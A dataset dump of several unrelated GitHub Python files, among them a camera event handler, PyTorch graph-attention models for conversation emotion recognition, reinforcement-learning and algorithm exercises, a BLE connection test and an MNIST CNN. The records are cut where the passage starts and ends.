self._ai_detection_states[channel][\"vehicle\"] = state\n elif rule == \"DogCatDetect\":\n self._ai_detection_states[channel][\"dog_cat\"] = state\n elif rule == \"Visitor\":\n self._visitor_states[channel] = state\n\n if not event_channels and not contains_channels:\n # ONVIF notification withouth known events\n if \"ONVIF_no_known\" not in self._log_once:\n self._log_once.append(\"ONVIF_no_known\")\n _LOGGER.warning(\"Reolink ONVIF notification received withouth any known events:\\n%s\", data)\n if not await self.get_motion_state_all_ch():\n _LOGGER.error(\"Could not poll motion state after receiving ONVIF event without any known events\")\n return None\n\n if self._onvif_only_motion[sub_type] and any(self.ai_supported(ch) for ch in event_channels):\n # Poll all other states since not all cameras have rich notifications including the specific events\n if f\"ONVIF_only_motion_{sub_type}\" not in self._log_once:\n self._log_once.append(f\"ONVIF_only_motion_{sub_type}\")\n _LOGGER.debug(\"Reolink model '%s' appears to not support rich notifications for %s\", self.model, sub_type)\n if not await self.get_ai_state_all_ch():\n _LOGGER.error(\"Could not poll AI event state after receiving ONVIF event with only motion event\")\n return None\n\n return event_channels\n","repo_name":"starkillerOG/reolink_aio","sub_path":"reolink_aio/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":199070,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"78"} +{"seq_id":"27346068537","text":"import torch\r\nfrom torch import nn\r\nfrom torch.nn import LSTM\r\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\r\nimport config\r\nimport torch.nn.functional as F\r\n\r\nclass BLSTMClass(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.dropout = nn.Dropout(0.5)\r\n self.lstm = LSTM(input_size=config.input_dim,\r\n hidden_size=config.hidden_dim // 2,\r\n num_layers=1,\r\n bidirectional=True,\r\n batch_first=True)\r\n self.clf = nn.Linear(config.hidden_dim, config.nclass)\r\n\r\n def forward(self, x, adj, a, b, c):\r\n x = self.lstm(x)[0]\r\n x = self.dropout(x)\r\n return self.clf(x)\r\n\r\ndef mask_logic(alpha, adj):\r\n '''\r\n performing mask logic with adj\r\n :param alpha:\r\n :param adj:\r\n :return:\r\n '''\r\n return alpha - (1 - adj) * 1e30\r\n\r\nclass GatDot(nn.Module):\r\n def __init__(self, hidden_size):\r\n super().__init__()\r\n self.linear1 = nn.Linear(hidden_size, hidden_size)\r\n self.linear2 = nn.Linear(hidden_size, hidden_size)\r\n\r\n def forward(self, Q, K, V, adj, s_mask):\r\n '''\r\n imformation gatherer with dot product attention\r\n :param Q: (B, D) # query utterance\r\n :param K: (B, N, D) # context\r\n :param V: (B, N, D) # context\r\n :param adj: (B, N) # the adj matrix of the i th node\r\n :return:\r\n '''\r\n N = K.size()[1]\r\n Q = self.linear1(Q).unsqueeze(2) # (B,D,1)\r\n # K = self.linear2(Q) # (B, N, D)\r\n K = self.linear2(K) # (B, N, D)\r\n alpha = torch.bmm(K, Q).permute(0, 2, 1) # (B, 1, N)\r\n adj = adj.unsqueeze(1)\r\n alpha = mask_logic(alpha, adj) # (B, 1, N)\r\n attn_weight = F.softmax(alpha, dim=2) # (B, 1, N)\r\n attn_sum = torch.bmm(attn_weight, V).squeeze(1) # (B, D)\r\n return attn_weight, attn_sum\r\n\r\nclass GatDot_rel(nn.Module):\r\n def __init__(self, hidden_size):\r\n super().__init__()\r\n self.linear1 = nn.Linear(hidden_size, hidden_size)\r\n self.linear2 = nn.Linear(hidden_size, hidden_size)\r\n self.linear3 = nn.Linear(hidden_size, 1)\r\n self.rel_emb = nn.Embedding(2, hidden_size)\r\n\r\n def forward(self, Q, K, V, adj, s_mask):\r\n '''\r\n imformation gatherer with dot product attention\r\n :param Q: (B, D) # query utterance\r\n :param K: (B, N, D) # context\r\n :param V: (B, N, D) # context\r\n :param adj: (B, N) # the adj matrix of the i th node\r\n :param s_mask: (B, N) # relation mask\r\n :return:\r\n '''\r\n N = K.size()[1]\r\n rel_emb = self.rel_emb(s_mask)\r\n Q = self.linear1(Q).unsqueeze(2) # (B,D,1)\r\n K = self.linear2(K) # (B, N, D)\r\n y = self.linear3(rel_emb) # (B, N, 1\r\n alpha = (torch.bmm(K, Q) + y).permute(0, 2, 1) # (B, 1, N)\r\n adj = adj.unsqueeze(1) # adj-> [B,1,i]\r\n alpha = mask_logic(alpha, adj) # (B, 1, N)\r\n attn_weight = F.softmax(alpha, dim=2) # (B, 1, N)\r\n attn_sum = torch.bmm(attn_weight, V).squeeze(1) # (B, D)\r\n return attn_weight, attn_sum\r\n\r\nclass DAGERC(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.dropout = nn.Dropout(0.1)\r\n self.fc1 = nn.Linear(config.input_dim, config.hidden_dim)\r\n self.fc2 = nn.Linear(config.input_dim, config.hidden_dim)\r\n gats1 = []\r\n for _ in range(config.layers):\r\n gats1 += [GatDot(config.hidden_dim)]\r\n self.gather1 = nn.ModuleList(gats1)\r\n grus = []\r\n linears = []\r\n for _ in range(config.layers):\r\n grus += [nn.GRUCell(config.hidden_dim, config.hidden_dim)]\r\n linears += [nn.Linear(config.hidden_dim*2, config.hidden_dim)]\r\n self.grus = nn.ModuleList(grus)\r\n self.linears = nn.ModuleList(linears)\r\n # for out put\r\n in_dim = config.hidden_dim * (config.layers + 1) + config.input_dim\r\n # output mlp layers\r\n layers = [nn.Linear(in_dim, config.hidden_dim), nn.ReLU()]\r\n for _ in range(config.layers - 1):\r\n layers += [nn.Linear(config.hidden_dim, config.hidden_dim), nn.ReLU()]\r\n layers += [nn.Linear(config.hidden_dim, config.nclass)]\r\n self.out_mlp = nn.Sequential(*layers)\r\n\r\n def forward(self, x, adj, s_mask, s_feature, s_adj):\r\n '''\r\n :param x: feature B,N,D\r\n :param adj: B,N,N\r\n :param s_mask: B,N,N,2\r\n :param s_feature: B,M,D\r\n :param s_adj: B,M,N\r\n :return:\r\n '''\r\n num_utter = x.size()[1]\r\n H0 = F.relu(self.fc1(x)) # (B, N, D)\r\n s_feature = F.relu(self.fc2(s_feature)) # (B, M, D) # speaker features\r\n H = [H0]\r\n P = [s_feature]\r\n for l in range(config.layers):\r\n Mp = torch.bmm(s_adj.permute(0,2,1), P[l])\r\n H1 = self.grus[l](H[l][:, 0, :]).unsqueeze(1)\r\n for i in range(1, num_utter):\r\n _, M = self.gather1[l](H[l][:, i, :], H1, H1, adj[:, i, :i], s_mask)\r\n Mpi = Mp[:, i, :] # B,1,D\r\n M = torch.cat([M, Mpi], dim=-1)\r\n M = self.linears[l](M)\r\n H1 = torch.cat((H1, self.grus[l](H[l][:, i, :], M).unsqueeze(1)), dim=1)\r\n H1 = self.dropout(H1)\r\n H.append(H1)\r\n # update P from utterance\r\n P_l_1 = torch.bmm(s_adj, H1)\r\n Plm = []\r\n for m in range(P_l_1.shape[1]):\r\n Plm.append(self.grus[l](P[l][:, m, :], P_l_1[:, m, :]).unsqueeze(1))\r\n Pl = torch.cat(Plm, dim=1) # B,M,D\r\n P.append(Pl)\r\n H.append(x)\r\n H = torch.cat(H, dim=2) # (B, N, l*D)\r\n logits = self.out_mlp(H)\r\n return logits\r\n\r\nclass RGATLayer(nn.Module):\r\n \"\"\"\r\n Simple GAT layer, similar to https://arxiv.org/abs/1710.10903\r\n \"\"\"\r\n def __init__(self, input_dim, out_dim, dropout=0.1, alpha=0.1, concat=True):\r\n super(RGATLayer, self).__init__()\r\n self.dropout = dropout\r\n self.in_features = input_dim\r\n self.out_features = out_dim\r\n self.alpha = alpha\r\n self.concat = concat\r\n self.W = nn.Parameter(torch.zeros(size=(self.in_features, self.out_features))).cuda()\r\n nn.init.xavier_uniform_(self.W.data, gain=1.414)\r\n self.a = nn.Parameter(torch.zeros(size=(self.out_features*3, 1))).cuda()\r\n nn.init.xavier_uniform_(self.a.data, gain=1.414)\r\n\r\n self.leakyrelu = nn.LeakyReLU(self.alpha)\r\n self.rel_emb = nn.Embedding(2, config.hidden_dim)\r\n\r\n def forward(self, x, adj, s_mask):\r\n h = torch.matmul(x, self.W) # B,N,D\r\n N = h.size()[1] # nV=30\r\n batch = h.size()[0]\r\n h1 = h.repeat(1, 1, N).view(batch, N * N, -1)\r\n h2 = h.repeat(1, N, 1)\r\n r = self.rel_emb(s_mask).view(batch, N*N, -1)\r\n # attention with relation\r\n a_input = torch.cat([h1, h2, r], dim=2).view(batch, N, N, 3*self.out_features) # [B, N, N, 3D]\r\n # a_input = torch.cat([h1, h2]).view(batch, N, N, 2*self.out_features) # [B, N, N, 3D]\r\n e = self.leakyrelu(torch.matmul(a_input, self.a).squeeze(3)) # [128, 30, 30]\r\n zero_vec = -9e15 * torch.ones_like(e)\r\n attention = torch.where(adj > 0, e, zero_vec) # adj > 0 zero_vec\r\n attention = F.softmax(attention, dim=2) # [128, 30, 30]\r\n self.att = attention\r\n attention = F.dropout(attention, self.dropout, training=self.training)\r\n h_prime = torch.matmul(attention, h)\r\n if self.concat:\r\n return F.elu(h_prime)\r\n else:\r\n return h_prime\r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\r\n\r\nclass GRU3d(nn.Module):\r\n def __init__(self, hidden = config.hidden_dim):\r\n super().__init__()\r\n self.hidden = hidden\r\n self.w_z = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.u_z = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.w_r = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.u_r = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.w = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.u = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.reset_parameters()\r\n\r\n def forward(self, x, c): #\r\n '''\r\n :param x: current hidden state (cat of p_l_1 and aggregation of RGAT) #B,N,D\r\n :param c: cell state(last hidden state) #B,N,2D\r\n :return:\r\n '''\r\n z = torch.sigmoid(torch.matmul(x, self.w_z) + torch.matmul(c, self.u_z))\r\n r = torch.sigmoid(torch.matmul(x, self.w_r) + torch.matmul(c, self.u_r))\r\n h_hat = torch.tanh(torch.matmul(x, self.w) + r*torch.matmul(c, self.u))\r\n return (1-z)*x + z*h_hat\r\n\r\n def reset_parameters(self):\r\n std = 0.1\r\n for weight in self.parameters():\r\n weight.data.normal_(mean=0.0, std=std) # 平均数为0方差为0.1的标准正态分布\r\n\r\nclass Scaled_Dot_Product_Attention(nn.Module):\r\n '''Scaled Dot-Product Attention '''\r\n def __init__(self):\r\n super(Scaled_Dot_Product_Attention, self).__init__()\r\n\r\n def forward(self, Q, K, V, scale=None):\r\n '''\r\n Args:\r\n Q: [batch_size, len_Q, dim_Q]\r\n K: [batch_size, len_K, dim_K]\r\n V: [batch_size, len_V, dim_V]\r\n scale:\r\n Return:\r\n self-attention\r\n '''\r\n attention = torch.matmul(Q, K.permute(0, 2, 1))\r\n if scale:\r\n attention = attention * scale\r\n attention = F.softmax(attention, dim=-1)\r\n context = torch.matmul(attention, V)\r\n return context\r\n\r\n\r\nclass Multi_Head_Attention(nn.Module):\r\n def __init__(self, dim_model, num_head=4):\r\n super(Multi_Head_Attention, self).__init__()\r\n self.num_head = num_head\r\n assert dim_model % num_head == 0\r\n self.dim_head = dim_model // self.num_head\r\n self.fc_V = nn.Linear(dim_model, num_head * self.dim_head)\r\n self.fc_K = nn.Linear(dim_model, num_head * self.dim_head)\r\n self.fc_Q = nn.Linear(dim_model, num_head * self.dim_head)\r\n self.attention = Scaled_Dot_Product_Attention()\r\n self.fc = nn.Linear(num_head * self.dim_head, dim_model)\r\n self.dropout = nn.Dropout(config.dropout)\r\n self.layer_norm = nn.LayerNorm(dim_model)\r\n\r\n def forward(self, x, K, Q):\r\n batch_size = x.size(0)\r\n V = self.fc_V(x)\r\n Q = self.fc_Q(Q)\r\n K = self.fc_K(K)\r\n Q = Q.view(batch_size * self.num_head, -1, self.dim_head)\r\n K = K.view(batch_size * self.num_head, -1, self.dim_head)\r\n V = V.view(batch_size * self.num_head, -1, self.dim_head)\r\n scale = K.size(-1) ** -0.5\r\n context = self.attention(Q, K, V, scale)\r\n context = context.view(batch_size, -1, self.dim_head * self.num_head)\r\n out = self.fc(context)\r\n # out = self.dropout(out)\r\n out = out + x\r\n out = self.layer_norm(out)\r\n return out\r\n\r\nclass PERC(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.dropout = nn.Dropout(config.dropout)\r\n # self.embedding = nn.Embedding(config.speaker_vocab, config.hidden_dim)\r\n self.fc1 = nn.Linear(config.input_dim, config.hidden_dim)\r\n self.fc2 = nn.Linear(config.input_dim, config.hidden_dim)\r\n gats = []\r\n for _ in range(config.layers):\r\n gats += [RGATLayer(config.hidden_dim, config.hidden_dim)]\r\n self.gather = nn.ModuleList(gats)\r\n grus, grus2 = [], []\r\n Aggs = []\r\n for _ in range(config.layers):\r\n grus += [GRU3d(config.hidden_dim)]\r\n if config.att_agg:\r\n Aggs += [Multi_Head_Attention(config.hidden_dim)]\r\n else:\r\n Aggs += [nn.Linear(config.hidden_dim*3, config.hidden_dim)]\r\n self.grus = nn.ModuleList(grus)\r\n self.agg = nn.ModuleList(Aggs)\r\n self.out_mlp = nn.Linear(config.hidden_dim, config.nclass)\r\n # self.layer_norm = nn.LayerNorm(config.hidden_dim)\r\n\r\n def forward(self, x, adj, s_mask, s_feature, s_adj, speaker_id):\r\n '''\r\n :param x: feature B,N,D\r\n :param adj: B,N,N\r\n :param s_mask: B,N,N,2\r\n :param s_feature: B,M,D\r\n :param s_adj: B,M,N\r\n :return:\r\n '''\r\n H0 = F.relu(self.fc1(x)) # (B, N, D)\r\n H0 = self.dropout(H0)\r\n H = [H0]\r\n if config.init_way == 'global':\r\n s_feature = F.relu(self.fc2(s_feature)) # (B, M, D) # speaker features\r\n if config.init_way == 'random':\r\n s_feature = F.relu(self.fc2(s_feature))\r\n s_feature = torch.rand_like(s_feature)\r\n if config.init_way == 'local':\r\n s_feature = torch.bmm(s_adj, x)\r\n s_feature = F.relu(self.fc2(s_feature))\r\n # if config.init_way == 'embed':\r\n # s_feature = self.embedding(speaker_id)\r\n # # print(s_feature.shape)\r\n\r\n P = [s_feature]\r\n for l in range(config.layers):\r\n P_l_1 = torch.bmm(s_adj.permute(0, 2, 1), P[l])\r\n Agg = self.gather[l](H[l], adj, s_mask)\r\n if config.att_agg:\r\n H_l = self.agg[l](H[l], P_l_1, Agg)\r\n else:\r\n Agg_ = torch.cat([H[l], P_l_1, Agg], dim=-1) # B,N,D,3\r\n H_l = F.relu(self.agg[l](Agg_))\r\n H_l = self.dropout(H_l)\r\n H.append(H_l)\r\n # update P_l from all utteracne and P_l_1\r\n P_l = torch.bmm(s_adj, H[l])\r\n P_l = self.grus[l](P[l], P_l)\r\n P.append(P_l)\r\n p_sim = self.sim_loss(P[-1])\r\n # print(P[-1].shape, H[-1].shape)\r\n # H = torch.cat([P_l_1, H[-1]],dim=-1)\r\n logits = self.out_mlp(H[-1])\r\n # logits = self.out_mlp(H0)\r\n return logits, p_sim\r\n\r\n def sim_loss(self, p):\r\n p_sim = torch.bmm(p, p.permute(0, 2, 1))\r\n m = p_sim.shape[-1]\r\n b = p_sim.shape[0]\r\n mask = torch.ones_like(p_sim)\r\n eyes = torch.eye(m).repeat(b,1,1).cuda()\r\n mask = mask - eyes\r\n p_sim = p_sim*mask\r\n p_sim = torch.mean(p_sim, dim=-1)\r\n p_sim = torch.mean(p_sim, dim=-1)\r\n p_sim = torch.mean(p_sim, dim=-1)\r\n return p_sim","repo_name":"songruiecho/SUNET","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"392879239","text":"# Projeto 2 de Inteligencia Artificial\r\n#\r\n# Grupo 22\r\n#\r\n# Miguel Sena - 86420\r\n# Joao Palet - 86447 \r\n\r\nimport random\r\nimport numpy as np\r\nimport copy\r\nfrom random import randint\r\n\r\nfrom tempfile import TemporaryFile\r\noutfile = TemporaryFile()\r\n\t\r\nclass finiteMDP:\r\n\r\n def __init__(self, nS, nA, gamma, P=[], R=[], absorv=[]):\r\n self.nS = nS\r\n self.nA = nA\r\n self.gamma = gamma\r\n self.Q = np.zeros((self.nS,self.nA))\r\n self.P = P\r\n self.R = R\r\n self.absorv = absorv\r\n # completar se necessario\r\n \r\n \r\n def runPolicy(self, n, x0, poltype = 'greedy', polpar=[]):\r\n #nao alterar\r\n traj = np.zeros((n,4))\r\n x = x0\r\n J = 0\r\n for ii in range(0,n):\r\n a = self.policy(x,poltype,polpar)\r\n r = self.R[x,a]\r\n y = np.nonzero(np.random.multinomial( 1, self.P[x,a,:]))[0][0]\r\n traj[ii,:] = np.array([x, a, y, r])\r\n J = J + r * self.gamma**ii\r\n if self.absorv[x]:\r\n y = x0\r\n x = y\r\n \r\n return J,traj\r\n\r\n\r\n def VI(self):\r\n #nao alterar\r\n nQ = np.zeros((self.nS,self.nA))\r\n while True:\r\n self.V = np.max(self.Q,axis=1) \r\n for a in range(0,self.nA):\r\n nQ[:,a] = self.R[:,a] + self.gamma * np.dot(self.P[:,a,:],self.V)\r\n err = np.linalg.norm(self.Q-nQ)\r\n self.Q = np.copy(nQ)\r\n if err<1e-7:\r\n break\r\n \r\n #update policy\r\n self.V = np.max(self.Q,axis=1) \r\n #correct for 2 equal actions\r\n self.Pol = np.argmax(self.Q, axis=1)\r\n \r\n return self.Q, self.Q2pol(self.Q)\r\n\r\n \r\n def traces2Q(self, trace):\r\n nextQ = copy.deepcopy(self.Q)\r\n\r\n while True:\r\n for move in trace:\r\n initialState = int(move[0])\r\n action = int(move[1])\r\n finalState = int(move[2])\r\n reward = move[3]\r\n\r\n nextQ[initialState, action] = nextQ[initialState, action] + 0.2*(reward + self.gamma*max(self.Q[finalState]) - nextQ[initialState, action])\r\n\r\n err = np.linalg.norm(self.Q - nextQ)\r\n self.Q = np.copy(nextQ)\r\n\r\n if err < 1e-7:\r\n break\r\n \r\n return self.Q\r\n \r\n def policy(self, x, poltype = 'exploration', par = []): \r\n if poltype == 'exploitation':\r\n a = np.argmax(par[x])\r\n \r\n elif poltype == 'exploration':\r\n a = randint(0, self.nA - 1)\r\n \r\n return a\r\n \r\n def Q2pol(self, Q, eta=5):\r\n return np.exp(eta*Q)/np.dot(np.exp(eta*Q),np.array([[1,1],[1,1]]))\r\n\r\n\r\n ","repo_name":"joaopalet/LEIC-IST","sub_path":"3rd_Year/IA/proj2/Projeto/RL.py","file_name":"RL.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9024301001","text":"import sys\nfrom heapq import heappush, heappop\ninput = sys.stdin.readline\n\ndef getParent(ls, x):\n if ls[x] == x:\n return ls[x]\n ls[x] = getParent(ls, ls[x])\n return ls[x]\n\ndef unionParent(ls, a, b):\n a = getParent(ls, a)\n b = getParent(ls, b)\n if a > b:\n ls[a] = b\n else:\n ls[b] = a\n\ndef findParent(ls, a, b):\n a = getParent(ls, a)\n b = getParent(ls, b)\n if a == b:\n return True\n else:\n return False\n\n\nN, M, K = map(int,input().split())\n\nparent = [i for i in range(N+1)]\n\nplant = list(map(int,input().split()))\nedges = []\nfor i in range(M):\n u, v, w = map(int,input().split())\n edges.append([w, u, v])\nedges.sort()\nfor i in range(len(plant) - 1):\n unionParent(parent, plant[i], plant[i+1])\n\nans = 0\nfor cost, from_, to_ in edges:\n if not findParent(parent, from_, to_):\n unionParent(parent, from_, to_)\n ans += cost\n\nprint(ans)\n","repo_name":"HiGeuni/Problem-Solving","sub_path":"BaekJoon/10423.py","file_name":"10423.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12634550002","text":"from djsonapi import serial\n\nfrom example.testapp import models\n\n\n\n@serial.serializer(models.Report, mode=\"limited\")\ndef serialize_report_limited(obj, **kwargs):\n \"\"\"\n Serialize a report in limited mode.\n \"\"\"\n # serialize_model, same as serialize_fields but with debugging information for models\n limited_data = serial.serialize_model(obj, fields=(\"title\", \"message\",))\n return limited_data\n\n\n@serial.serializer(models.Report, mode=\"full\")\ndef serialize_report_full(obj, **kwargs):\n \"\"\"\n Serialize a report in full mode.\n \"\"\"\n # Get limited data\n limited_data = serialize_report_limited(obj, **kwargs)\n # Add to it\n full_data = serial.serialize_model(obj, (\"status\"))\n full_data.update(limited_data)\n # Return the full data\n return full_data","repo_name":"explodes/djsonapi","sub_path":"example/testapp/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29979815328","text":"# Binary Tree using List \n\n# -First cell will remain empty \n# -Left Child=cell[2x]\n# -Right Child = cell[2x+1]\n\n# where x is the index of rootnode cell\n\n\n# Creation of Binary Tree\n\nclass BinaryTree:\n def __init__(self,size):\n self.customList=size*[None]\n self.lastUsedIndex=0\n self.maxSize=size\n# O(1),O(n)\n\n\n# insert a value in Binary tree\n def insert(self,nodeValue):\n if self.lastUsedIndex+1==self.maxSize:\n return \"The Binary tree is full\"\n self.customList[self.lastUsedIndex+1]=nodeValue\n self.lastUsedIndex+=1\n return \"The value is successfully inserted\"\n\n\n def searchNode(self,nodevalue):\n if self.lastUsedIndex==0:\n return \"The Binary Tree is Empty\"\n else:\n for i in range(len(self.customList)):\n if self.customList[i+1]==None:\n break\n elif self.customList[i]==nodevalue:\n return \"The value is present in Binary Tree\"\n return \"The value is not present on the list\"\n\n# -Left Child=cell[2x]\n# -Right Child = cell[2x+1]\n\n def preorderTraversal(self,index):\n if self.lastUsedIndex==0:\n return \"The binary Tree is Empty\"\n if index>self.lastUsedIndex:\n return \n print(self.customList[index])\n self.preorderTraversal(index*2)\n self.preorderTraversal(index*2+1)\n\n# Blank return statement can be used to transfer the \n# control back to the calling function \n \n\n# Inorder traversal\n\n def inorderTraversal(self,index):\n if index>self.lastUsedIndex:\n return \n self.inorderTraversal(index*2)\n print(self.customList[index])\n self.inorderTraversal(index*2+1)\n\n\n def postorderTraversal(self,index):\n if index>self.lastUsedIndex:\n return \n self.postorderTraversal(index*2)\n self.postorderTraversal(index*2+1)\n print(self.customList[index]) \n# O(n),O(n)\n\n\n def levelordertraversal2(self,index):\n for i in range(index,self.lastUsedIndex+1):\n print(self.customList[i])\n\n\n def deleteNode(self,nodeValue):\n for i in range(1,self.lastUsedIndex):\n if self.customList[i]==nodeValue:\n self.customList[i]=self.customList[self.lastUsedIndex]\n self.customList[self.lastUsedIndex]=None\n self.lastUsedIndex-=1\n return \"The node is deleted\"\n\n\n def deleteEntire(self):\n self.customList=None\n return \"The binary is deleted\"\n \n\n \n\n\n\nnewBT =BinaryTree(8)\nnewBT.insert(\"Drinks\")\nnewBT.insert(\"Hot\")\nnewBT.insert(\"Cold\")\nnewBT.insert(\"Tea\")\nnewBT.insert(\"Coffee\")\nnewBT.insert(\"Fanta\")\nnewBT.insert(\"Cola\")\n# print(newBT.searchNode(\"fanta\"))\nnewBT.deleteEntire()\nnewBT.levelordertraversal2(1)","repo_name":"Amaan5033/Data-Structure-And-Algorithm","sub_path":"Data Structures/BinarytreeList.py","file_name":"BinarytreeList.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24926101567","text":"import cg\n\nimport re\n\nimport testbox\n\nclass WindowTranslate(cg.Translate):\n\n def extract(filename, algebra):\n pat_score = re.compile('^Optimal Score: ([-.0-9]+)')\n pat_algebra = re.compile('^Algebra: ([A-Za-z0-9]+)')\n pat_end = re.compile('^================================================================================')\n pat_begin = re.compile('^============================== Suboptimal Output ===============================')\n pat_cand = re.compile('^(.+) \\(Score: ([-.0-9]+)\\)')\n pat_bounds = re.compile('^([0-9]+) +([0-9]+)')\n\n \n f = open(filename)\n look = testbox.look_into([filename])\n d = cg.WindowData()\n bounds = None\n length = -1\n state = -1\n for i in f:\n if state == -1:\n match = pat_algebra.search(i)\n if match:\n if algebra == '' or algebra == match.group(1):\n al = algebra\n else:\n raise cg.TranslateError('Wrong algebra in window mode: ' + algebra\n + ' vs. ' + match.group(1) + look)\n state = 0\n elif state == 0:\n match = pat_score.search(i)\n if match:\n e = cg.Data()\n e.algebra = al\n e.optimal_score = float(match.group(1)) / 100\n state = 1\n continue\n else:\n match = pat_bounds.search(i)\n if match:\n bounds = ( int(match.group(1)), int(match.group(2)) )\n if length < 0:\n length = len(i) - 1\n elif len(i) - 1 != length:\n raise cg.TranslateError('Length of sequence/bounds differs in window '\n + str(bounds) + ':\\n'\n + ' ' + i + ' (len: ' + str(len(i) - 1) + ' vs. len: ' \n + str(length) + look)\n elif state == 1:\n match = pat_begin.search(i)\n if match:\n state = 2\n else:\n raise cg.TranslateError('Found no start in window '\n + str(bounds) + '.' + look)\n elif state == 2:\n match = pat_cand.search(i)\n if match:\n (cand, score) = match.groups()\n if len(cand) != length:\n raise cg.TranslateError('Length of candidate structures does not match in window '\n + str(bounds) + ':\\n'\n + cand + ' (len: ' + str(len(cand)) + ') vs. len: '\n + str(length) + look)\n e.candidates.append((float(score) / 100, cand))\n else:\n match = pat_end.search(i)\n d.addWindow(bounds, e)\n if match:\n state = 0\n else:\n raise cg.TranslateError('Found no end or candidate in window '\n + str(bounds) + '.' + look)\n\n f.close()\n if state != 0:\n raise cg.TranslateError('Found no end at the end.' + look)\n return d\n \n extract = staticmethod(extract)\n\n","repo_name":"u-u-h/adpc","sub_path":"testsuite/lib/cg/java/windowtranslate.py","file_name":"windowtranslate.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14193160215","text":"from typing import Any, Optional, List\n\n\nclass Node:\n def __init__(self, value: Any):\n self.value = value\n self.left: Optional[Node] = None\n self.right: Optional[Node] = None\n\n def __repr__(self):\n return str(self.value)\n\n\nclass BinaryTree:\n def __init__(self, head: Node):\n self.head = head\n\n def depth_first_traversal(self, node: Optional[Any], acc: List = []) -> List[Node]:\n if node:\n acc += [node.value]\n acc = self.depth_first_traversal(node.left, acc)\n acc = self.depth_first_traversal(node.right, acc)\n return acc\n else:\n return acc\n\n def breadth_first_traversal(\n self, node: Optional[Any], acc: List = []\n ) -> List[Node]:\n if node:\n if len(acc) == 0:\n acc += [self.head.value]\n for i in [node.left, node.right]:\n if i:\n acc += [i.value]\n for j in [node.left, node.right]:\n if j:\n self.breadth_first_traversal(j, acc)\n return acc\n else:\n return acc\n\n\nif __name__ == \"__main__\":\n el1 = Node(1)\n el2 = Node(2)\n el3 = Node(3)\n el4 = Node(4)\n el5 = Node(5)\n el6 = Node(6)\n\n el1.left = el2\n el1.right = el3\n el1.left.left = el4\n el1.right.left = el5\n el1.right.right = el6\n\n btree = BinaryTree(el1)\n\n acc = btree.depth_first_traversal(btree.head)\n print(acc)\n\n","repo_name":"xasopheno/study","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24315603376","text":"# A test program for a bleak connection that is explicitly closed.\n\nimport asyncio\nimport platform\nimport sys\nimport time\nimport signal\nfrom bleak import BleakClient, BleakScanner\nimport signal\n\n# Adapt to your actual device.\ndevice_address = \"0C:8B:95:F2:B4:36\"\n\nsignal.signal(signal.SIGINT, lambda number, frame: sys.exit())\n\nprint(f\"OS: {platform.platform()}\", flush=True)\nprint(f\"Platform:: {platform.uname()}\", flush=True)\nprint(f\"Python {sys.version}\", flush=True)\n\n\nasync def test():\n #global client\n print(f\"Trying to connect to {device_address}\", flush=True)\n device = await BleakScanner.find_device_by_address(device_address, timeout=10.0)\n assert device\n async with BleakClient(device) as client:\n assert client.is_connected\n print(f\"Connected\", flush=True)\n print(f\"Waiting 5 secs...\", flush=True)\n time.sleep(5.0)\n print(f\"Closing...\", flush=True)\n assert client.is_connected\n await client.disconnect()\n print(f\"Test done\", flush=True)\n\n\nasyncio.run(test())\n","repo_name":"zapta/ble_stepper_motor_analyzer","sub_path":"python/test/connection_disconnect.py","file_name":"connection_disconnect.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"12982525713","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom dlwizard.common import train_mnist\n\n\n# https://www.deeplearningwizard.com/deep_learning/practical_pytorch/pytorch_convolutional_neuralnetwork/\nclass CNN(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2)\n self.pool1 = nn.MaxPool2d(kernel_size=2)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=1, padding=2)\n self.pool2 = nn.MaxPool2d(kernel_size=2)\n self.fc1 = nn.Linear(32 * 7 * 7, 10)\n\n def forward(self, x):\n \"\"\"\n :param x: tensor(*, 28, 28) 输入图像\n :return: tensor(*, 10)\n \"\"\"\n out = F.relu(self.conv1(x)) # (*, 16, 28, 28)\n out = self.pool1(out) # (*, 16, 14, 14)\n out = F.relu(self.conv2(out)) # (*, 32, 14, 14)\n out = self.pool2(out) # (*, 32, 7, 7)\n out = out.view(out.shape[0], -1) # (*, 32 * 7 * 7)\n out = self.fc1(out) # (*, 10)\n return out\n\n\ndef main():\n model = CNN()\n optimizer = optim.SGD(model.parameters(), lr=0.01)\n for p in model.parameters():\n print(p.size())\n train_mnist(model, optimizer, (-1, 1, 